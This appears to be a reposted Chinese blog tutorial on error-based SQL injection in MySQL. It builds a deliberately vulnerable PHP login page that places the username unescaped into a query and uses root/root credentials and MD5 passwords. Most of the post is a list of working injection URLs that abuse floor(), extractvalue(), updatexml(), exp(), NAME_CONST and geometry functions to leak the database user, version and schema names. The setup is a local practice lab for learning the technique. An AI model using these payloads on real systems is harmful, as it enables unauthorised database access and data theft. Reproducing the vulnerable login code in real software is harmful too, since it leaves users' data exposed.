标签:
mysql> create database sqli; mysql> create table user ( id int(11) not null auto_increment primary key, name varchar(20) not null, pass varchar(32) not null ); mysql> insert into user (name, pass) values (‘admin‘, md5(‘admin888‘)), (‘guest‘, md5(‘guest‘));
<?php $conn = mysql_connect("localhost", "root", "root"); // 连接数据库,账号root,密码root if (!$conn) { die("Connection failed: " . mysql_error()); } mysql_select_db("sqli", $conn); // verify login info if (isset($_GET[‘name‘]) && isset($_GET[‘pass‘])) { $name = $_GET[‘name‘]; $pass = md5($_GET[‘pass‘]); $query = "select * from user where name=‘$name‘ and pass=‘$pass‘"; if ($result = mysql_query($query, $conn)) { $row = mysql_fetch_array($result, MYSQL_ASSOC); if ($row) { echo "<script>alert(‘login successful!‘);</script>"; } } else { die("Operation error: " . mysql_error()); } } mysql_close(); ?> <!DOCTYPE html> <html> <head> <title>Login</title> </head> <body> <center> <form method="get" action=""> <label>Username:</label><input type="text" name="name" value=""/><br/> <label>Password:</label><input type="password" name="pass" value=""/><br/> <input type="submit" value="login"/> </form> </center> </body> </html>
index.php的php验证登陆的代码很简单:
$name = $_GET[‘name‘]; $pass = md5($_GET[‘pass‘]); $query = "select * from user where name=‘$name‘ and pass=‘$pass‘";
$name 参数是明显的注入点
1、通过floor()报错:
http://localhost/index.php?name=‘+or+(select+1+from(select+count(*),concat(user(),0x7e,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+%23&pass=1
# 爆数据库:用关键字替换自己想要查询的东西
http://localhost/index.php?name=‘+or+(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)+%23&pass=1
2、通过extractvalue()报错:
http://localhost/index.php?name=‘+or+extractvalue(1,concat(user(),0x7e,version()))+%23&pass=1
3、通过updatexml()报错:
http://localhost/index.php?name=‘+or+updatexml(1,concat(user(),0x7e,version()),1)+%23&pass=1
4、通过exp()报错:详细请看:https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/
http://localhost/index.php?name=‘+or+EXP(~(SELECT * from(select user())a))+%23&pass=1
5、通过NAME_CONST(适用于低版本)报错:
http://localhost/index.php?name=‘+or+(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)+%23&pass=1
6、通过multipoint()、multipolygon()、multilinestring()、linestring()、GeometryCollection()、polygon()等函数报错:
http://localhost/index.php?name=‘+or+multipoint((select * from(select * from(select user())a)b))+%23&pass=1 http://localhost/index.php?name=‘+or+multipolygon((select * from(select * from(select database())a)b))+%23&pass=1 http://localhost/index.php?name=‘+or+multilinestring((select * from(select * from(select user())a)b))+%23&pass=1 http://localhost/index.php?name=‘+or+LINESTRING((select * from(select * from(select user())a)b))+%23&pass=1 http://localhost/index.php?name=‘+or+GeometryCollection((select * from(select * from(select user())a)b))+%23&pass=1 http://localhost/index.php?name=‘+or+polygon((select * from(select * from(select user())a)b))+%23&pass=1
标签:
原文地址:http://www.cnblogs.com/tyomcat/p/5410816.html
